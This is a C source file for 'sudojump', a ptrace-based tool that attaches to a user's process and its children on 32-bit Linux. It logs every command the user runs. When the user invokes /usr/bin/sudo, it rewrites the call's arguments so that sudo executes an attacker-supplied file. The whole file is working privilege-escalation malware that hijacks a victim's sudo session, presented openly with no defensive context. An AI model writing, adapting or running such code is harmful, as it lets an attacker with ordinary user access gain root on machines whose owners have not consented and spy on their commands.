#include <unistd.h>
#include <stdio.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <linux/user.h>
#include <stdlib.h>
#include <getopt.h>
#include <string.h>

#define MAX_PATH 1024
#define MAX_ARGS 128
#define MAX_ATTACHED_PIDS 1024
int num_attached_pids = 0;
pid_t attached_pids[MAX_ATTACHED_PIDS];

void detach(void) {
    int i;
    for (i = 0; i < num_attached_pids; i++) 
        if (attached_pids[i] != 0)
            ptrace(PTRACE_DETACH, attached_pids[i], 0, 0);
}

void detach_pid(pid_t pid) {
    int i;
    for (i = 0; i < num_attached_pids; i++) 
        if (attached_pids[i] == pid) {
            attached_pids[i] = 0;
            ptrace(PTRACE_DETACH, pid, 0, 0);
        }

    while (attached_pids[num_attached_pids - 1] == 0)
        num_attached_pids--;
}

void attach(pid_t pid) {
    if (num_attached_pids == MAX_ATTACHED_PIDS) {
        fprintf(stderr, "cannot attach to anymore pids\n");
        return;
    }
    attached_pids[num_attached_pids] = pid;
    if (ptrace(PTRACE_ATTACH, pid, 0, 0) == -1) {
        fprintf(stderr, "error attaching to pid %i\n", pid);
        return;
    }
    num_attached_pids++;
}

void version() {
    printf("sudojump version 0.1\n");
}

void usage() {
    printf("usage: sudojump [-d] [-v] [-h] <pid> <file to exec>\n");
    printf("    -d drop original arguments.\n");
    printf("    -v prints version info.\n");
    printf("    -h prints this help.\n");
    printf("\n");
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        usage();
        return 1;
    }

    int droporiginalargs = 0;

    int opt;
    while ((opt = getopt(argc, argv, "vdh")) != -1) {
        switch(opt) {
            case 'd':
                droporiginalargs = 1;
                break;
            case 'v':
                version();
                return 1;
            case 'h':
                usage();
                return 1;
        }
    }

    const char *jumpto = argv[optind + 1];

    attach(atoi(argv[optind]));
    if (num_attached_pids == 0)
        return 1;

    atexit(detach);

    ptrace(PTRACE_SYSCALL, attached_pids[0], 0, 0);

    int count = 0;

    for(;;) {
        int status;
        int pid = wait(&status);
        if (WIFSTOPPED(status)) {
            struct user_regs_struct regs;
            ptrace(PTRACE_GETREGS, pid, 0, &regs);
        
            if (regs.orig_eax == 2 || regs.orig_eax == 120) {
                if (regs.eax > 0) {
                    attach(regs.eax);                   
                }
            }

            if (regs.orig_eax == 11 && regs.ecx) {
                int i;
                char path[MAX_PATH];
                unsigned int argptrs[MAX_ARGS];
                char *args[MAX_ARGS];
                int argcount;
                
                // get the path of the file to be executed
                path[MAX_PATH - 1] = 0;
                for (i = 0; i < MAX_PATH - 1; i++) {
                    unsigned int c = ptrace(PTRACE_PEEKTEXT, pid, regs.ebx + i, 0);
                    path[i] = c & 0xff;
                    if ((c & 0xff) == 0) break;
                }

                // get the pointers for the arguments being passed
                argptrs[MAX_ARGS - 1] = 0;
                for (i = 0; i < MAX_ARGS - 1; i++) {
                    unsigned int p = ptrace(PTRACE_PEEKTEXT, pid, regs.ecx + i * 4, 0);
                    argptrs[i] = p;
                    if (p == 0) break;
                }

                // now get the arguments
                for (i = 0; argptrs[i]; i++) {
                    int j;

                    // get length of arg string
                    for (j = 0; ; j++) {
                        unsigned int c = ptrace(PTRACE_PEEKTEXT, pid, argptrs[i] + j, 0);
                        if ((c & 0xff) == 0) break;
                    }

                    args[i] = malloc(j + 1);

                    // get the string
                    for (j = 0; ; j++) {
                        unsigned int c = ptrace(PTRACE_PEEKTEXT, pid, argptrs[i] + j, 0);
                        args[i][j] = c & 0xff;
                        if ((c & 0xff) == 0) break;
                    }
                }
                args[i] = 0;
                argcount = i;

                // print out the path and the arguments, for reference
                printf("execve (%s)", path);
                for (i = 0; args[i]; i++) {
                    if (i != 0)
                        putchar(',');
                    printf(" \"%s\"", args[i]);
                }
                printf("\n");

                // if the file being run is sudo, run our file instead
                if (!strcmp(path, "/usr/bin/sudo")) {
                    // firstly, forget about it if they're passing options
                    // (this is left as an exercise to the reader)
                    if (args[1][0] != '-') {
                        regs.esp -= strlen(jumpto) + 1 + 4 * (argcount + 2);
                        for (i = 0; jumpto[i]; i++)
                            ptrace(PTRACE_POKETEXT, pid, regs.esp + i, jumpto[i]);
                        regs.ecx = regs.esp + i + 1;
                        ptrace(PTRACE_POKETEXT, pid, regs.ecx, argptrs[0]);
                        ptrace(PTRACE_POKETEXT, pid, regs.ecx + 4, regs.esp);
                        if (droporiginalargs) {
                            ptrace(PTRACE_POKETEXT, pid, regs.ecx + 8, 0);
                        } else {
                            for (i = 1; i < argcount + 1; i++)
                                ptrace(PTRACE_POKETEXT, pid, regs.ecx + 4 + i * 4, argptrs[i]);
                        }
                        ptrace(PTRACE_SETREGS, pid, 0, &regs);
                    }
                }

                // if the file being run is suid or sgid, we must detach now
                // otherwise it will not run with those permissions
                struct stat st;
                if (stat(path, &st) == 0 &&     
                        ((st.st_mode & S_ISUID) || 
                         (st.st_mode & S_ISGID))) {
                    detach_pid(pid);
                    pid = 0;
                }

                // free args
                for (i = 0; args[i]; i++)
                    free(args[i]);
            }

            if (pid)
                ptrace(PTRACE_SYSCALL, pid, 0, 0);
        }
    }

    return 0;
}

